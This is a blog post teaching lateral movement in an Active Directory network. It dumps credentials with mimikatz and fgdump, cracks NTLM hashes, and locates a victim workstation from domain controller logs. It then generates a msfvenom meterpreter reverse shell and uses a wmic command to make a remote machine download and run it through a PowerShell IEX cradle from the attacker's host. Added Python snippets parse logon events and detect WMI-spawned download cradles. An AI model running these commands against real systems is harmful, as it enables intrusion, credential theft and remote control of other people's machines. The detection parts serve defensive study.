Lateral movement in Active Directory Network with LOLBAS

Hi everyone! Today’s post covers the basics of lateral movement in an Active Directory (AD) network. In this article, we will focus on using LOLBAS and reverse shells to compromise other computers in the internal network. Let’s get started!

Network

The diagram below shows the network we will be using in this example.

Assumption

  • We have compromised the webserver (GNU/Linux).
  • We have compromised the Domain Controller (DC).
    • This means pivoting into the internal network has already been set up:
      • via Metasploit’s autoroute (if you have a meterpreter shell on the webserver), or
      • via sshuttle (requires Python on the webserver).
  • The UserA and UserB workstations are Windows machines.
  • UserA and UserB do not have the RDP service enabled.
  • UserA and UserB can reach the outside network for daily tasks such as browsing the web, SSH to other computers, etc.

Goal

  • Obtaining plaintext passwords.
  • Compromising other Windows workstations (UserA and UserB).
    • Obtaining reverse shells on them.

Obtaining Domain Admin’s credential

To obtain the Domain Admin’s credentials, we will dump them from the Domain Controller (DC).

Via meterpreter

Let’s say you have a meterpreter shell on the DC. We can load mimikatz (the kiwi extension) into memory and obtain the plaintext password or the NTLM hash: mimikatz searches LSASS memory for both.

meterpreter> load kiwi
meterpreter> kiwi_cmd 'sekurlsa::logonpasswords'
...
Authentication ID : 0; 290000 (00000000:00012345)
Session           : Interactive from 1
User name         : owner
Domain            : MEME
Logon Server      : WIN-C0123456789
Logon Time        : 27/11/2021 00:00:00 AM
SID               : S-1-5-21-0123456789-0123456789-0123456789-123
      msv : 
       [00000005] Primary
       * Username : owner
       * Domain   : MEME
       * LM       : 3FA389CC77997D32B79AE2610DD89D4C
       * NTLM     : 506A1916A5F459398CD31EF2F9EDB616
       * SHA1     : 3a8abc1b6f49fbdfc76bdaf9a8e5e0f775a67a81
      tspkg :
       * Username : owner
       * Domain   : MEME
       * Password : tomjerry
      wdigest :
       * Username : owner
       * Domain   : MEME
       * Password : tomjerry
      kerberos :
       * Username : owner
       * Domain   : MEME
       * Password : tomjerry

Alternatively, if you only have a plain reverse shell, transfer mimikatz.exe from your Kali/Parrot (or whatever attacking machine you are using) to the DC and run it there.

Via fgdump (usually used with a simple reverse shell)

You can download fgdump here. In the reverse shell:

C:\Windows\Temp> fgdump.exe
owner:500:NO PASSWORD*********************:506A1916A5F459398CD31EF2F9EDB616:::

Copy the NTLM hash (the fourth field) and crack it using hashcat on your Windows host (add the “-O” flag to speed it up on a GPU) or on your attacking machine. Mode 1000 is NTLM:

kali@kali$ hashcat -m 1000 hash.txt wordlists.txt

Compromising UserA workstation

Let’s say we want to compromise UserA but we don’t know his/her IP address. We could port scan and ping sweep the whole network, which gives us a list of IP addresses we can attack, but it would not tell us which one belongs to UserA. Instead, we can query the Domain Controller’s event logs. Note that this way of finding out is only possible in an Active Directory network. Of course, if you don’t care which workstation belongs to whom and just want to compromise them all, you can use Metasploit’s auxiliary portscan module via autoroute pivoting, or nmap via sshuttle pivoting.

Finding the IP address of UserA

Firstly, we will need the SID of UserA. In CMD:

C:\Windows\System32> wmic useraccount get name,sid
UserA   S-1-5-21-9988776655-4433221100-0011223344-321
UserB   S-1-5-21-0011223344-5566778899-0011223344-321
owner   S-1-5-21-0123456789-0123456789-0123456789-123

You will need a PowerShell session on the DC, so either the reverse shell you generated must be a PowerShell one, or you can spawn PowerShell from the meterpreter shell:

meterpreter> load powershell
meterpreter> powershell_shell
PS>

Once you have a PowerShell on the Domain Controller, input the following:

PS> Get-WinEvent -FilterHashtable @{LogName='Security';Data='S-1-5-21-9988776655-4433221100-0011223344-321'} | Where-Object {$_.Id -eq 4624} | Select-Object -First 1 | Select-Object -ExpandProperty Message
...
Network Information:
        Workstation Name:       DESKTOP-1234567
        Source Network Address: 192.168.1.2
        Source Port:            54321
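The query above hands you the raw Message text of the newest matching 4624 event. As an added example (not from the original post), here is a small Python parser for that message layout, run over constructed sample events, that resolves a SID to the workstation name and source address while handling two caveats the one-liner does not: the Data= filter matches the SID anywhere in the event (including as the Subject of someone else’s logon), and console logons carry no source address. The make_4624 builder and the parse_event_message and locate_user functions are names of my own.

```python
SID_A = "S-1-5-21-9988776655-4433221100-0011223344-321"      # UserA's SID, from the post
SID_OWNER = "S-1-5-21-0123456789-0123456789-0123456789-123"  # owner's SID, from the post

def make_4624(subject_sid, new_sid, account, logon_type, workstation, addr):
    """Build a constructed 4624 Message body in the layout Get-WinEvent prints."""
    return (
        "An account was successfully logged on.\n"
        f"Subject:\n\tSecurity ID:\t\t{subject_sid}\n"
        f"Logon Information:\n\tLogon Type:\t\t{logon_type}\n"
        f"New Logon:\n\tSecurity ID:\t\t{new_sid}\n\tAccount Name:\t\t{account}\n"
        f"Network Information:\n\tWorkstation Name:\t{workstation}\n"
        f"\tSource Network Address:\t{addr}\n\tSource Port:\t\t54321\n"
    )

# Constructed sample events, newest first (the order Get-WinEvent returns them).
SAMPLE_EVENTS = [
    make_4624("S-1-5-18", SID_A, "UserA", 2, "WIN-C0123456789", "-"),           # console logon
    make_4624(SID_A, SID_OWNER, "owner", 3, "DESKTOP-7654321", "192.168.1.9"),  # SID_A only as Subject
    make_4624("S-1-0-0", SID_A, "UserA", 3, "DESKTOP-1234567", "192.168.1.2"),  # the one we want
]

def parse_event_message(message):
    """Split an event Message body into {section: {field: value}}."""
    sections, current = {}, None
    for line in filter(str.strip, message.splitlines()):
        if not line[0].isspace() and line.rstrip().endswith(":"):
            current = line.strip()[:-1]          # e.g. "New Logon"
            sections[current] = {}
        elif current is not None and ":" in line:
            name, _, value = line.strip().partition(":")
            sections[current][name.strip()] = value.strip()
    return sections

def locate_user(messages, target_sid):
    """Newest network logon by target_sid as (workstation, source address), or None.
    Data= matches the SID anywhere in the event, so require it in 'New Logon' (not
    Subject) and skip logons with no usable source address (console logons show '-')."""
    for msg in messages:
        ev = parse_event_message(msg)
        if ev.get("New Logon", {}).get("Security ID") != target_sid:
            continue
        net = ev.get("Network Information", {})
        addr = net.get("Source Network Address", "-")
        if addr in {"-", "::1", "127.0.0.1"}:
            continue
        return net.get("Workstation Name"), addr
    return None
```

To use it against a real DC, export the Message property of the matching events (e.g. from the Get-WinEvent query above) and pass them as the list of strings.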

Generate a shell and setup listener

Generate a reverse shell. In this example, I will use the fileless approach to be stealthier, so that no file ends up on UserA’s disk, and I will use a meterpreter payload. You can generate other kinds of payload. I would not recommend a bind shell, as you might need to add an inbound firewall rule on UserA’s computer for the port it binds to.

kali@kali$ msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=22.22.11.11 LPORT=443 -f psh-reflection -o hehe.ps1

Set up an HTTP service on your attacking machine (this is needed for the fileless approach too). Serve on port 80, since the download URL used later has no explicit port and port 443 is taken by the meterpreter handler:

kali@kali$ sudo python3 -m http.server 80

Set up a reverse meterpreter listener in Metasploit (launched with sudo, since port 443 is privileged) in the background. Use netcat instead if you are using a plain reverse shell.

msf> handler -p windows/x64/meterpreter_reverse_tcp -H 22.22.11.11 -P 443

Obtain a shell on UserA

In the Domain Controller (DC)’s shell, use wmic to make UserA’s machine run PowerShell, which downloads and executes the script with IEX. You can also use the wmic LOLBAS for other things, such as running a file you dropped, downloading files with certutil, modifying firewall rules, etc.

C:\Windows\System32> wmic /node:"192.168.1.2" /USER:"MEME\owner" /PASSWORD:"tomjerry" PROCESS call create "powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://22.22.11.11/hehe.ps1')"

You should see a request for hehe.ps1 in your HTTP server’s log just before the reverse shell from UserA’s computer arrives! You can repeat the same steps for UserB.
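From the defender’s side, the wmic call above leaves a telltale process tree on UserA’s machine: WMI’s provider host WmiPrvSE.exe spawning powershell.exe with a download-and-execute cradle on its command line. The following Python is an added detection example (not part of the original post), run over constructed process-creation records in a Sysmon event 1 / Security 4688-like shape; the record fields and the function names are my own assumptions.

```python
import re
import ntpath  # handles Windows paths regardless of the host OS

# Markers of the fileless cradle shown in the post: IEX over a WebClient download.
CRADLE_RE = re.compile(r"\b(IEX|Invoke-Expression)\b", re.I)
DOWNLOAD_RE = re.compile(r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest", re.I)

# Constructed process-creation records (Sysmon event 1 / 4688 style), not real telemetry.
SAMPLE_EVENTS = [
    {"host": "DESKTOP-1234567",
     "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe IEX (New-Object Net.WebClient)"
                ".DownloadString('http://22.22.11.11/hehe.ps1')"},
    {"host": "DESKTOP-7654321",
     "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\inventory.ps1"},
    {"host": "DESKTOP-1234567",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile Get-Process"},
]

def classify(event):
    """Label one record: 'wmi-cradle', 'wmi-powershell' or None (not interesting)."""
    parent = ntpath.basename(event["parent"]).lower()
    image = ntpath.basename(event["image"]).lower()
    if parent != "wmiprvse.exe" or image not in ("powershell.exe", "pwsh.exe"):
        return None
    cmd = event["cmdline"]
    if CRADLE_RE.search(cmd) and DOWNLOAD_RE.search(cmd):
        return "wmi-cradle"       # remote WMI spawned a download-and-execute cradle
    return "wmi-powershell"       # WMI-spawned PowerShell; review, may be admin tooling

def find_wmi_lateral_movement(events):
    """Return [(host, label)] for every record worth an analyst's attention."""
    hits = []
    for ev in events:
        label = classify(ev)
        if label:
            hits.append((ev["host"], label))
    return hits
```

The second record shows why the rule has two tiers: legitimate management tooling also launches PowerShell through WMI, so only the cradle pattern is a high-confidence alert while the rest is a review queue.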

Conclusion

There are many other ways to move laterally, such as using PsExec, but they are much noisier because they show up in the Windows event logs. Lateral movement also depends on the group policies and configurations in place. There is a good collection of cheatsheets by Cas which will be useful if you are doing red teaming or preparing for OSEP.

I hope this article has been helpful to you. Feel free to leave any comments below. You may also send me some tips if you like my work and want to see more of such content. Funds will mostly be used for my boba milk tea addiction. The link is here. 🙂
